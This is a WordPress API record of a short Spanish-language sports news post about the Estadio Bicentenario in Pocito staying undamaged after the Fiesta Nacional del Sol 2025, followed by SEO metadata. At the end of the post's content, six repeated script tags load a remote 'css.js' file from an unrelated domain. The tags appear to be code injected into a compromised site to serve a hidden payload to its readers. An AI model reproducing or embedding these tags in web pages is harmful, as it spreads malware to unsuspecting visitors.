{"id":24197,"date":"2025-11-25T12:59:53","date_gmt":"2025-11-25T15:59:53","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=24197"},"modified":"2026-02-02T18:46:08","modified_gmt":"2026-02-02T21:46:08","slug":"asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/","title":{"rendered":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Concluida la&nbsp;<strong>Fiesta Nacional del Sol 2025<\/strong>, comenzaron las labores de desmontaje en el predio de&nbsp;<strong>Pocito<\/strong>, donde miles de sanjuaninos y turistas disfrutaron del m\u00e1ximo evento cultural provincial durante cuatro d\u00edas consecutivos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Los trabajos incluyeron la remoci\u00f3n de estructuras usadas para los distintos escenarios y \u00e1reas recreativas, adem\u00e1s de la retirada de elementos especiales destinados a resguardar el campo de juego del&nbsp;<strong>Estadio Bicentenario<\/strong>, sede de los shows principales.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Desde la organizaci\u00f3n destacaron que el estadio permaneci\u00f3 en excelente estado, sin da\u00f1os en el c\u00e9sped ni en sus instalaciones, pese al elevado flujo de p\u00fablico que ingres\u00f3 durante toda la fiesta. El&nbsp;<strong>sistema de protecci\u00f3n<\/strong>&nbsp;aplicado funcion\u00f3 a la perfecci\u00f3n, manteniendo el campo \u00abcomo nuevo\u00bb.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Las autoridades resaltaron que anualmente se incorporan mejoras para preservar las instalaciones y optimizar la log\u00edstica, asegurando que el estadio sea un espacio multiprop\u00f3sito sin afectar su rendimiento deportivo.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La&nbsp;<strong>Fiesta Nacional del Sol<\/strong>&nbsp;una vez m\u00e1s demostr\u00f3 la adaptabilidad del Bicentenario para grandes eventos masivos, garantizando el cuidado de su infraestructura y la continuidad de sus actividades habituales.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Concluida la&nbsp;Fiesta Nacional del Sol 2025, comenzaron las labores de desmontaje en el predio de&nbsp;Pocito, donde miles de sanjuaninos y turistas disfrutaron del m\u00e1ximo evento cultural provincial durante cuatro d\u00edas consecutivos. Los trabajos incluyeron la remoci\u00f3n de estructuras usadas para los distintos escenarios y \u00e1reas recreativas, adem\u00e1s de la retirada de elementos especiales destinados a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24198,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[178],"tags":[],"class_list":["post-24197","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Concluida la&nbsp;Fiesta Nacional del Sol 2025, comenzaron las labores de desmontaje en el predio de&nbsp;Pocito, donde miles de sanjuaninos y turistas disfrutaron del m\u00e1ximo evento cultural provincial durante cuatro d\u00edas consecutivos. Los trabajos incluyeron la remoci\u00f3n de estructuras usadas para los distintos escenarios y \u00e1reas recreativas, adem\u00e1s de la retirada de elementos especiales destinados a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-25T15:59:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:46:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"898\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS\",\"datePublished\":\"2025-11-25T15:59:53+00:00\",\"dateModified\":\"2026-02-02T21:46:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/\"},\"wordCount\":205,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/11\\\/estadio.jpg\",\"articleSection\":[\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/\",\"name\":\"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/11\\\/estadio.jpg\",\"datePublished\":\"2025-11-25T15:59:53+00:00\",\"dateModified\":\"2026-02-02T21:46:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/11\\\/estadio.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/11\\\/estadio.jpg\",\"width\":1600,\"height\":898},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/11\\\/25\\\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/","og_locale":"es_ES","og_type":"article","og_title":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes","og_description":"Concluida la&nbsp;Fiesta Nacional del Sol 2025, comenzaron las labores de desmontaje en el predio de&nbsp;Pocito, donde miles de sanjuaninos y turistas disfrutaron del m\u00e1ximo evento cultural provincial durante cuatro d\u00edas consecutivos. Los trabajos incluyeron la remoci\u00f3n de estructuras usadas para los distintos escenarios y \u00e1reas recreativas, adem\u00e1s de la retirada de elementos especiales destinados a [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-11-25T15:59:53+00:00","article_modified_time":"2026-02-02T21:46:08+00:00","og_image":[{"width":1600,"height":898,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS","datePublished":"2025-11-25T15:59:53+00:00","dateModified":"2026-02-02T21:46:08+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/"},"wordCount":205,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg","articleSection":["San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/","name":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg","datePublished":"2025-11-25T15:59:53+00:00","dateModified":"2026-02-02T21:46:08+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/11\/estadio.jpg","width":1600,"height":898},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/11\/25\/asi-quedo-el-estadio-del-bicentenario-despues-de-la-fns\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"As\u00ed qued\u00f3 el Estadio del Bicentenario despu\u00e9s de la FNS"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=24197"}],"version-history":[{"count":7,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24197\/revisions"}],"predecessor-version":[{"id":28453,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24197\/revisions\/28453"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/24198"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=24197"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=24197"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=24197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}